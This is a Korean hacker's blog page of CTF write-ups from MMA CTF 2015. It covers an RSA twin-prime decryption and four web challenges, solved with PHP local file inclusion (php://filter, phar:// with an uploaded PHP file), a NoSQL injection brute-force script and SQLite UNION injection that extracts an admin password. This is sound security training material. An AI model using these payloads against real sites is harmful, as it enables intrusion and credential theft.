shpik's world!

'0x400 CTF/0x401 MMA 1st 2015'에 해당되는 글 5건

  1. [Crypto] Twin Prime - 50pts
  2. [Web] Global Page - 50pts
  3. [Web] Get the admin password! - 100pts
  4. [Web] Mortal Magi Agents - 300pts
  5. [Web] Login as admin! - 30pts

[Crypto] Twin Prime - 50pts

0x400 CTF/0x401 MMA 1st 2015


Problem

Decrypt it.
twin-primes.7z

Flag

#Your ScoreScoreYour RatingsTeams
15050
x 1 2 3 4 5
183



# encrypt.py
from Crypto.Util.number import *
import Crypto.PublicKey.RSA as RSA
import os

N = 1024

def getTwinPrime(N):
    while True:
        p = getPrime(N)
        if isPrime(p+2):
            return p

def genkey(N = 1024):
    p = getTwinPrime(N)
    q = getTwinPrime(N)
    n1 = p*q
    n2 = (p+2)*(q+2)
    e = long(65537)
    d1 = inverse(e, (p-1)*(q-1))
    d2 = inverse(e, (p+1)*(q+1))
    key1 = RSA.construct((n1, e, d1))
    key2 = RSA.construct((n2, e, d2))
    if n1 < n2:
        return (key1, key2)
    else:
        return (key2, key1)

rsa1, rsa2 = genkey(N)

with open("flag", "r") as f:
    flag = f.read()
padded_flag = flag + "\0" + os.urandom(N/8 - 1 - len(flag))

c = bytes_to_long(padded_flag)
c = rsa1.encrypt(c, 0)[0]
c = rsa2.encrypt(c, 0)[0]

with open("key1", "w") as f:
    f.write("%d\n" % rsa1.n)
    f.write("%d\n" % rsa1.e)
with open("key2", "w") as f:
    f.write("%d\n" % rsa2.n)
    f.write("%d\n" % rsa2.e)

with open("encrypted", "w") as f:
    f.write("%d\n" % c)


n1 = p*q

n2 = p*q + 2( p+q ) + 4

2( p+q ) = n2 - p*q - 4

p+q = ( n2 - n1 - 4 )/2


(p-1)*(q-1) in d1.

= p*q - ( p+q ) + 1


(p+1)*(q+1) in d1.

= p*q + ( p+q ) + 1


# twin_prime.py
from Crypto.Util.number import *
import Crypto.PublicKey.RSA as RSA
import os

n1 = 19402643768027967294480695361037227649637514561280461352708420192197328993512710852087871986349184383442031544945263966477446685587168025154775060178782897097993949800845903218890975275725416699258462920097986424936088541112790958875211336188249107280753661467619511079649070248659536282267267928669265252935184448638997877593781930103866416949585686541509642494048554242004100863315220430074997145531929128200885758274037875349539018669336263469803277281048657198114844413236754680549874472753528866434686048799833381542018876362229842605213500869709361657000044182573308825550237999139442040422107931857506897810951
n2 = 19402643768027967294480695361037227649637514561280461352708420192197328993512710852087871986349184383442031544945263966477446685587168025154775060178782897097993949800845903218890975275725416699258462920097986424936088541112790958875211336188249107280753661467619511079649070248659536282267267928669265252935757418867172314593546678104100129027339256068940987412816779744339994971665109555680401467324487397541852486805770300895063315083965445098467966738905392320963293379345531703349669197397492241574949069875012089172754014231783160960425531160246267389657034543342990940680603153790486530477470655757947009682859
e = long(65537)

p_q = (n2-n1-4)/2
phi_n1 = n1-p_q+1
phi_n2 = n1+p_q+1

d1 = inverse(e, phi_n1)
d2 = inverse(e, phi_n2)

key1 = RSA.construct((n1,e,d1))
key2 = RSA.construct((n2,e,d2))

c = 7991219189591014572196623817385737879027208108469800802629706564258508626010674513875496029177290575819650366802730803283761137036255380767766538866086463895539973594615882321974738140931689333873106124459849322556754579010062541988138211176574621668101228531769828358289973150393343109948611583609219420213530834364837438730411379305046156670015024547263019932288989808228091601206948741304222197779808592738075111024678982273856922586615415238555211148847427589678238745186253649783665607928382002868111278077054871294837923189536714235044041993541158402943372188779797996711792610439969105993917373651847337638929


c = key2.decrypt(c)
c = key1.decrypt(c)
c = long_to_bytes(c)
print c
'''
shpik@shpik:/ctf/MMA/crypt$ python twin_primes.py 
TWCTF{3102628d7059fa267365f8c37a0e56cf7e0797ef}
 ࠝ髀	0ݔм5듲E$K
麗hj@殁¾؈'(喠ﻫ¬a걅Ƅm¶ZLʔa

'''


'0x400 CTF > 0x401 MMA 1st 2015' 카테고리의 다른 글

[Crypto] Twin Prime - 50pts  (0) 2016.09.05
[Web] Global Page - 50pts  (0) 2016.09.05
[Web] Get the admin password! - 100pts  (0) 2016.09.05
[Web] Mortal Magi Agents - 300pts  (0) 2015.09.09
[Web] Login as admin! - 30pts  (0) 2015.09.08

[Web] Global Page - 50pts

0x400 CTF/0x401 MMA 1st 2015

Problem

This problem is not available now.
[09/03 01:14 +00:00] fixed.

Welcome to TokyoWesterns' CTF!

Flag

#Your ScoreScoreYour RatingsTeams
15050
x 1 2 3 4 5
195




shpik@shpik:/ctf/MMA/web/gap$ curl http://globalpage.chal.ctf.westerns.tokyo/?page=tokyo

<!doctype html>

<html>

<head>

<meta charset=utf-8>

<title>Global Page</title>

<style>

.rtl {

  direction: rtl;

}

</style>

</head>


<body>

<br />

<b>Notice</b>:  Undefined index: HTTP_ACCEPT_LANGUAGE in <b>/var/www/globalpage/index.php</b> on line <b>36</b><br />

<p>

<br />

<b>Warning</b>:  include(tokyo/.php): failed to open stream: No such file or directory in <b>/var/www/globalpage/index.php</b> on line <b>41</b><br />

<br />

<b>Warning</b>:  include(): Failed opening 'tokyo/.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in <b>/var/www/globalpage/index.php</b> on line <b>41</b><br />

</p>

</body>

</html>


HTTP_ACCEPT_LANGUAGE is file name.

and page is directory.



So i expect include $page.'/'.'HEADER HTTP_ACCEPT_LANGUAGE's value'




shpik@shpik:/ctf/MMA/web/gap$ curl 'http://globalpage.chal.ctf.westerns.tokyo/?page=php:' -H "Accept-Language:/filter/convert.base64-encode/resource=index"

<!doctype html>

<html>

<head>

<meta charset=utf-8>

<title>Global Page</title>

<style>

.rtl {

  direction: rtl;

}

</style>

</head>


<body>

<p>

PD9waHAKaWYgKCFkZWZpbmVkKCdJTkNMVURFRF9JTkRFWCcpKSB7CmRlZmluZSgnSU5DTFVERURfSU5ERVgnLCB0cnVlKTsKaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLCAxKTsKaW5jbHVkZSAiZmxhZy5waHAiOwo/Pgo8IWRvY3R5cGUgaHRtbD4KPGh0bWw+CjxoZWFkPgo8bWV0YSBjaGFyc2V0PXV0Zi04Pgo8dGl0bGU+R2xvYmFsIFBhZ2U8L3RpdGxlPgo8c3R5bGU+Ci5ydGwgewogIGRpcmVjdGlvbjogcnRsOwp9Cjwvc3R5bGU+CjwvaGVhZD4KCjxib2R5Pgo8P3BocAokZGlyID0gIiI7CmlmKGlzc2V0KCRfR0VUWydwYWdlJ10pKSB7CgkkZGlyID0gc3RyX3JlcGxhY2UoWycuJywgJy8nXSwgJycsICRfR0VUWydwYWdlJ10pOwp9CgppZihlbXB0eSgkZGlyKSkgewo/Pgo8dWw+Cgk8bGk+PGEgaHJlZj0iLz9wYWdlPXRva3lvIj5Ub2t5bzwvYT48L2xpPgoJPGxpPjxkZWw+V2VzdGVybnM8L2RlbD48L2xpPgoJPGxpPjxhIGhyZWY9Ii8/cGFnZT1jdGYiPkNURjwvYT48L2xpPgo8L3VsPgo8P3BocAp9CmVsc2UgewoJZm9yZWFjaChleHBsb2RlKCIsIiwgJF9TRVJWRVJbJ0hUVFBfQUNDRVBUX0xBTkdVQUdFJ10pIGFzICRsYW5nKSB7CgkJJGwgPSB0cmltKGV4cGxvZGUoIjsiLCAkbGFuZylbMF0pOwo/Pgo8cDw/PSgkbD09PSdoZScpPyIgY2xhc3M9cnRsIjoiIj8+Pgo8P3BocAoJCWluY2x1ZGUgIiRkaXIvJGwucGhwIjsKPz4KPC9wPgo8P3BocAoJfQp9Cj8+CjwvYm9keT4KPC9odG1sPgo8P3BocAp9Cj8+Cg==</p>

</body>

</html>



okey i get index.php with php://filter !


<!-- index.php --> <?php if (!defined('INCLUDED_INDEX')) { define('INCLUDED_INDEX', true); ini_set('display_errors', 1); include "flag.php"; ?> <!doctype html> <html> <head> <meta charset=utf-8> <title>Global Page</title> <style> .rtl { direction: rtl; } </style> </head> <body> <?php $dir = ""; if(isset($_GET['page'])) { $dir = str_replace(['.', '/'], '', $_GET['page']); } if(empty($dir)) { ?> <ul> <li><a href="/?page=tokyo">Tokyo</a></li> <li><del>Westerns</del></li> <li><a href="/?page=ctf">CTF</a></li> </ul> <?php } else { foreach(explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']) as $lang) { $l = trim(explode(";", $lang)[0]); ?> <p<?=($l==='he')?" class=rtl":""?>> <?php include "$dir/$l.php"; ?> </p> <?php } } ?> </body> </html> <?php } ?>

maybe i get flag.php's source for getting flag.


shpik@shpik:/ctf/MMA/web/gap$ curl 'http://globalpage.chal.ctf.westerns.tokyo/?page=php:' -H "Accept-Language:/filter/convert.base64-encode/resource=flag"

<!doctype html>

<html>

<head>

<meta charset=utf-8>

<title>Global Page</title>

<style>

.rtl {

  direction: rtl;

}

</style>

</head>


<body>

<p>

PD9waHAKJGZsYWcgPSAiVFdDVEZ7SV9mb3VuZF9zaW1wbGVfTEZJfSI7Cg==</p>

</body>

</html>



Flag is

[ TWCTF{I_found_simple_LFI} ]



'0x400 CTF > 0x401 MMA 1st 2015' 카테고리의 다른 글

[Crypto] Twin Prime - 50pts  (0) 2016.09.05
[Web] Global Page - 50pts  (0) 2016.09.05
[Web] Get the admin password! - 100pts  (0) 2016.09.05
[Web] Mortal Magi Agents - 300pts  (0) 2015.09.09
[Web] Login as admin! - 30pts  (0) 2015.09.08

[Web] Get the admin password! - 100pts

0x400 CTF/0x401 MMA 1st 2015



This Problem is very Simple NoSQL injection.



# exploit.py
import urllib2
import urllib
URL = "http://gap.chal.ctf.westerns.tokyo/login.php"

result = ""
for i in range(100):
	for j in range(0x20,0x90):
		data = {'user' : 'admin', 'password[$lt]' : result+chr(j)}
		data = urllib.urlencode(data)
		req = urllib2.Request(URL,data)
		res = urllib2.urlopen(req)
		if res.read().find("Wrong user name or password")>10:
			continue
		else:
			result += chr(j-1)
			print result
			break
'''
shpik@shpik:/ctf/MMA/web/gap$ python exploit.py 
T
TW
TWC
TWCT
TWCTF
TWCTF{
TWCTF{w
TWCTF{wa
TWCTF{was
TWCTF{wass
TWCTF{wassh
TWCTF{wassho
TWCTF{wasshoi
TWCTF{wasshoi!
TWCTF{wasshoi!s
TWCTF{wasshoi!su
TWCTF{wasshoi!sum
TWCTF{wasshoi!summ
TWCTF{wasshoi!summe
TWCTF{wasshoi!summer
TWCTF{wasshoi!summer_
TWCTF{wasshoi!summer_f
TWCTF{wasshoi!summer_fe
TWCTF{wasshoi!summer_fes
TWCTF{wasshoi!summer_fest
TWCTF{wasshoi!summer_festi
TWCTF{wasshoi!summer_festiv
TWCTF{wasshoi!summer_festiva
TWCTF{wasshoi!summer_festival
TWCTF{wasshoi!summer_festival!
TWCTF{wasshoi!summer_festival!}
'''


'0x400 CTF > 0x401 MMA 1st 2015' 카테고리의 다른 글

[Crypto] Twin Prime - 50pts  (0) 2016.09.05
[Web] Global Page - 50pts  (0) 2016.09.05
[Web] Get the admin password! - 100pts  (0) 2016.09.05
[Web] Mortal Magi Agents - 300pts  (0) 2015.09.09
[Web] Login as admin! - 30pts  (0) 2015.09.08

[Web] Mortal Magi Agents - 300pts

0x400 CTF/0x401 MMA 1st 2015


Problem

http://magiagents.chal.mmactf.link/

Flag

#Your ScoreScoreTeams
1300300

77


This problem is LFI vulnerable.


Problem Page [ http://magiagents.chal.mmactf.link/ ]



'indxe.php?page=settings' is vulnerable point.

file upload is settings page.


First I got a php source.


http://magiagents.chal.mmactf.link/index.php?page=php://filter/convert.base64-encode/resource=home

// home.php


// index.php
<?php
session_start();

if (!isset($_GET["page"]) || isset($page))
    $page = "home";
else
    $page = $_GET["page"];
?>
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="favicon.ico">

    <title>Mortal Magi Agents</title>

    <!-- Bootstrap core CSS -->
    <link href="css/bootstrap.min.css" rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="css/jumbotron.css" rel="stylesheet">

    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
  </head>

  <body>

    <nav class="navbar navbar-inverse navbar-fixed-top">
      <div class="container">
        <div class="navbar-header">
          <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
            <span class="sr-only">Toggle navigation</span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a class="navbar-brand" href="index.php">Mortal Magi Agents</a>
        </div>
        <div id="navbar" class="collapse navbar-collapse">
          <ul class="nav navbar-nav">
            <li class="active"><a href="?page=home">Home</a></li>
            <li><a href="?page=news">News</a></li>
            <li><a href="#contact">Contact</a></li>
          </ul>
<?php if (isset($_SESSION["user"])) { ?>
          <ul class="nav navbar-nav navbar-right">
            <li class='dropdown'>
              <a href="#" aria-expanded="false" class="dropdown-toggle" data-toggle="dropdown" role="button">
              <?php
              if (isset($_SESSION["avator"])) {
                  echo '<img src="'.$_SESSION['avator'].'" width="32" height="32">';
              }
              echo $_SESSION["user"];
              ?><span class='caret'></span></a>
              <ul class='dropdown-menu' role='menu'>
              <li><a href="?page=settings">Settings</a></li>
              <li><a href="logout.php">Sign out</a></li>
              </ul>
            </li>
          </ul>
<?php } else { ?>
          <form class="navbar-form navbar-right" action="login.php" method="post">
            <div class="form-group">
              <input type="text" placeholder="User" class="form-control" name="user">
            </div>
            <div class="form-group">
              <input type="password" placeholder="Password" class="form-control" name="password">
            </div>
            <button type="submit" class="btn btn-success" name="signin">Sign in</button>
            <button type="submit" class="btn btn-danger" name="signup">Sign up</button>
          </form>
<?php } ?>
        </div><!--/.nav-collapse -->
      </div>
    </nav>

    <!-- Main jumbotron for a primary marketing message or call to action -->
    <!--
    <div class="jumbotron">
    </div>
    -->
    <div class="container">
<?php
include("$page.php");
?>
      </div>


      <hr>

      <footer>
        <p>Mortal Magi Agents 2015</p>
      </footer>
    </div> <!-- /container -->


    <!-- Bootstrap core JavaScript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
  </body>
</html>


// settings.php
<?php
require "./db.php";
if (isset($_FILES["file"])) {
    if ($_FILES['file']['type'] == "image/jpeg") {
        $ext = ".jpg";
    }
    else if ($_FILES['file']['type'] == "image/gif") {
        $ext = ".gif";
    }
    else if ($_FILES['file']['type'] == "image/png") {
        $ext = ".png";
    }
    $filename = "avators/" . $_SESSION["user"] . sha1_file($_FILES['file']['tmp_name']) . $ext;
    move_uploaded_file($_FILES['file']['tmp_name'], $filename);
    
    $_SESSION["avator"] = $filename;
    $db = connect_db();
    $db->query("UPDATE users SET avator = '$filename' WHERE name = '".$_SESSION['user']."'");
}
?>
<div class="page-header"><h1>Settings</h1></div>
<h2>Avator</h2>
<?php
if (isset($_SESSION["avator"])) {
?>
<img src="<?php echo $_SESSION['avator']; ?>" width="64" height="64">
<?php
}
?>
<h3>New avator</h3>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit">
</form>



upload file name is 'user'+sha1(filename)

but, this name is no problem.


i used phar://


getflag.php

<?php echo file_get_contents('../flag');?>


http://magiagents.chal.mmactf.link/?page=phar:///var/www/html/avators/afafafb347d0cf8bd02e7ddd7c018e74fa336beff2b0b5.jpg/getflag


MMA{5ded4df85bb8785f9cff08268703278c4e18e3fd}


Good

Flag is MMA{5ded4df85bb8785f9cff08268703278c4e18e3fd}


'0x400 CTF > 0x401 MMA 1st 2015' 카테고리의 다른 글

[Crypto] Twin Prime - 50pts  (0) 2016.09.05
[Web] Global Page - 50pts  (0) 2016.09.05
[Web] Get the admin password! - 100pts  (0) 2016.09.05
[Web] Mortal Magi Agents - 300pts  (0) 2015.09.09
[Web] Login as admin! - 30pts  (0) 2015.09.08

[Web] Login as admin! - 30pts

0x400 CTF/0x401 MMA 1st 2015


Problem

Login as admin. And get the flag! The flag is the password of admin.

http://arrive.chal.mmactf.link/login.cgi

You can use test:test.

Flag

#Your ScoreScoreTeams
13030318


Problem Page [ http://arrive.chal.mmactf.link/login.cgi ]

 
 



This Problem is sql injection,then this is sqlite.


Let's exploit!


First I send query simply


POST DATA : username=admin' --&password=1

Congratulations!!
You are admin user.
The flag is your password!

logout


oh... flag is admin's password.


therefore i find table name.


POST DATA : username=admin' union select name, NULL from sqlite_master--&password=1

You are user user.

logout

Table name is 'user'.


so, i inject username with union command


POST DATA : username=admin' union select password,NULL from user limit 0,1--&password=1


You are MMA{cats_alice_band} user.

logout


Good!

Flag is MMA{cats_alice_band}


Actually this problem is not filtering.

so, you can used blind sql injection.




Author : shpik (http://shpik.tistory.com)

'0x400 CTF > 0x401 MMA 1st 2015' 카테고리의 다른 글

[Crypto] Twin Prime - 50pts  (0) 2016.09.05
[Web] Global Page - 50pts  (0) 2016.09.05
[Web] Get the admin password! - 100pts  (0) 2016.09.05
[Web] Mortal Magi Agents - 300pts  (0) 2015.09.09
[Web] Login as admin! - 30pts  (0) 2015.09.08